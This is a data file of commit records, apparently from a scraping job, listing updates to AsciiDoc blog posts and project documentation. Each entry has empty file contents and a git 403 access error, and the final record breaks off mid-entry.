{"commit":"0730111747f8093ce3dbff343fee714151672894","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871c1dac5b79fc14a6436a3ca8e713b077e05b54","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29d3ca6154b35330b42202b934060d73a8180612","subject":"Update 2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","message":"Update 2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","new_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47f78fc2c9e816bd50f9c19f5d6be21208b66f63","subject":"Update 2018-02-02-Work-done-for-72394.adoc","message":"Update 
2018-02-02-Work-done-for-72394.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-02-02-Work-done-for-72394.adoc","new_file":"_posts\/2018-02-02-Work-done-for-72394.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c7e23422832223a3a73657167d7c7e9636ec439","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e376f32c1352ac2fef53ce6065f4038616faf81d","subject":"Update 2018-03-24-Blockchain-Design-considerations.adoc","message":"Update 2018-03-24-Blockchain-Design-considerations.adoc","repos":"peter-lawrey\/peter-lawrey.github.io,peter-lawrey\/peter-lawrey.github.io,peter-lawrey\/peter-lawrey.github.io,peter-lawrey\/peter-lawrey.github.io","old_file":"_posts\/2018-03-24-Blockchain-Design-considerations.adoc","new_file":"_posts\/2018-03-24-Blockchain-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peter-lawrey\/peter-lawrey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bc8a9fe1bdc9b6505ebf4e7b741073894b6b217","subject":"GF4, not 5","message":"GF4, not 5\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"App servers from Eclipse.adoc","new_file":"App servers from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f759cdaaa43c8eb27bc181c22b62515b28c5616b","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d956e1d5a95c364c48d2b5178bf782f506aa7067","subject":"Update 2015-06-16-Role-uzivatelu.adoc","message":"Update 2015-06-16-Role-uzivatelu.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea37bc2cc6b07ecaa422920705c5b43f9a65ca65","subject":"Update 2015-06-16-Role-uzivatelu.adoc","message":"Update 2015-06-16-Role-uzivatelu.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932fd10b1c5cb5ad9d8a6fa3607e05de8a159502","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcabc32c8a4c84709305c7f77099e5152df9d4be","subject":"Update 2018-04-23-Crypto-Zombies.adoc","message":"Update 2018-04-23-Crypto-Zombies.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faa53c4cd71c680d230831bf40ab0327ca5869ac","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0967705c55e795094e62c7c5b4007fbce6fca9b4","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d0d02c36b7148f4b309505b6cfa445de5555c66","subject":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Publish 
2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4449ceb1f8ef09506910fe7ce31e1d71a57a2070","subject":"doc updates","message":"doc updates\n","repos":"cfn-stacks\/artifacts3-plugin","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cfn-stacks\/artifacts3-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e1d6772f2e4ba05dc37f222711e14bf047dc892","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"089ccbc4b0d9b554599c2bbdf99b438c11cc6c0d","subject":"Update 2017-04-07-Incontri-nei-boschi.adoc","message":"Update 2017-04-07-Incontri-nei-boschi.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-07-Incontri-nei-boschi.adoc","new_file":"_posts\/2017-04-07-Incontri-nei-boschi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52178edb0b8203fe25bc6d72465d1f0e47134faa","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27d63db69db2911a244df4ee97deaca0d9f11b77","subject":"Update 2015-09-02-Liebes-Tagebuch.adoc","message":"Update 2015-09-02-Liebes-Tagebuch.adoc","repos":"dbect\/dbect.github.io,dbect\/dbect.github.io,dbect\/dbect.github.io","old_file":"_posts\/2015-09-02-Liebes-Tagebuch.adoc","new_file":"_posts\/2015-09-02-Liebes-Tagebuch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dbect\/dbect.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"8d2f79f51fb0788593873cee053376b8f1f0deef","subject":"Update 2017-07-14-Your-Blog-title.adoc","message":"Update 2017-07-14-Your-Blog-title.adoc","repos":"TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting","old_file":"_posts\/2017-07-14-Your-Blog-title.adoc","new_file":"_posts\/2017-07-14-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TunnyTraffic\/gh-hosting.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39377ad1bfd7a950f986b96231ba07a948313e5f","subject":"Update 2015-02-18-Post-3.adoc","message":"Update 2015-02-18-Post-3.adoc","repos":"DimShadoWWW\/blog,DimShadoWWW\/blog,DimShadoWWW\/blog","old_file":"_posts\/2015-02-18-Post-3.adoc","new_file":"_posts\/2015-02-18-Post-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DimShadoWWW\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ebe128cffc76aa216fd8d27fa950527548cea41","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/eastern_european_man.adoc","new_file":"content\/writings\/eastern_european_man.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d01a6b766dce18b8c9179cfc00255531ed96d4a7","subject":"Update 2017-02-03-Title.adoc","message":"Update 2017-02-03-Title.adoc","repos":"tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io","old_file":"_posts\/2017-02-03-Title.adoc","new_file":"_posts\/2017-02-03-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tofusoul\/tofusoul.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"296613665c94330ca9c3bec360e18ce16b38ab83","subject":"Update 2018-09-10-weeks.adoc","message":"Update 2018-09-10-weeks.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-10-weeks.adoc","new_file":"_posts\/2018-09-10-weeks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a4d975f432cf24df0056162dd476ffee9618eb0","subject":"Update 2017-05-19-Network-construction.adoc","message":"Update 2017-05-19-Network-construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-Network-construction.adoc","new_file":"_posts\/2017-05-19-Network-construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8472c982ae4a954c89f88a08f6615dc115661d5b","subject":"Update 
2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e56ef979103455d76c57745b0205292a5e17896","subject":"Renamed '_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc' to '_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc'","message":"Renamed '_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc' to '_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc","new_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-and-Tailwind-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c008cc6a3b615154b94273b806f3430e915ad00a","subject":"Add CHANGESv2 to track important changes for V2 (breaking changes).","message":"Add CHANGESv2 to track important changes for V2 (breaking changes).\n","repos":"gdamore\/tcell,zyedidia\/tcell,gdamore\/tcell,zyedidia\/tcell","old_file":"CHANGESv2.adoc","new_file":"CHANGESv2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gdamore\/tcell.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c51bffd2fdc9ca36edbaa89dfba7a3197e2d8f78","subject":"Update 2016-02-09-My-title.adoc","message":"Update 2016-02-09-My-title.adoc","repos":"pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io","old_file":"_posts\/2016-02-09-My-title.adoc","new_file":"_posts\/2016-02-09-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pej\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fb703f306c18f473b314bd6891f78becf83e116","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78ce9113d162253b65644359291e93755471f7b8","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 
2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"399a3f5c5da6c1a0ae57c99bc3dcbf29a96607dc","subject":"COMPILING: Zip is used for `make dist` also","message":"COMPILING: Zip is used for `make dist` also\n","repos":"CWolfRU\/freedoom,jmtd\/freedoom,jmtd\/freedoom,CWolfRU\/freedoom,jmtd\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmtd\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e9d6401bce0edc9bfceb7603efda8f2823a82a98","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee8765b8b1bb1112f96ca3d3aeeacec3dd16e2dc","subject":"Adding deleted file custom_control.adoc","message":"Adding deleted file custom_control.adoc","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/custom_controls.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/custom_controls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"08cd85147b9e5e481715fa7b7a48c5014eb17f3c","subject":"y2b create post MY NEW FAVORITE DISPLAY","message":"y2b create post MY NEW FAVORITE DISPLAY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-27-MY-NEW-FAVORITE-DISPLAY.adoc","new_file":"_posts\/2016-06-27-MY-NEW-FAVORITE-DISPLAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8e7c5432080bd77f4e35d7f7d3250e38bed88c8","subject":"Wording Objets","message":"Wording Objets\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ed0258a3d10f7a63bee39d2c46527d7570a6e8","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58a0f82b6e30baafead5921a84a37703f39024bd","subject":"Update 2016-11-07-Sunday-Night-Dream.adoc","message":"Update 2016-11-07-Sunday-Night-Dream.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da50c81c101386c8c917f49d6e815471e210250a","subject":"Worked on GZIP documentation","message":"Worked on GZIP documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/GZIP compressed stream format.asciidoc","new_file":"documentation\/GZIP compressed stream format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b77b6555e42f87c6aab914defc301701a9bca09","subject":"Update 2015-07-04-Hi.adoc","message":"Update 2015-07-04-Hi.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"_posts\/2015-07-04-Hi.adoc","new_file":"_posts\/2015-07-04-Hi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54f339debe8b7b05b248ef04a9fd46b44ab40787","subject":"Update 199399.adoc","message":"Update 199399.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/199399.adoc","new_file":"_posts\/199399.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d4e928ea362be844658e642d40350d36e899b89","subject":"Update 2016-11-08-185000-Tuesday-Evening.adoc","message":"Update 2016-11-08-185000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ba9f7525842d709e3977b3acf0bc64326b29c1e","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e17def3fe6335c2eed7996677016c9eec6061638","subject":"Update 2016-06-05-Hong-Kong.adoc","message":"Update 2016-06-05-Hong-Kong.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-05-Hong-Kong.adoc","new_file":"_posts\/2016-06-05-Hong-Kong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a94315e6531a7d0b41c191c7d27d5a4561164b8","subject":"Update 2016-09-26-Participa.adoc","message":"Update 2016-09-26-Participa.adoc","repos":"mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io","old_file":"_posts\/2016-09-26-Participa.adoc","new_file":"_posts\/2016-09-26-Participa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mozillahonduras\/mozillahonduras.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"736350fe10a7b65e2c4c2a911dbbdd526b37e341","subject":"Add guide for MP Metrics","message":"Add guide for MP Metrics\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/metrics-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/metrics-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75274211e7039761112c67d1f4554ef4cab72fd6","subject":"Update 2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","message":"Update 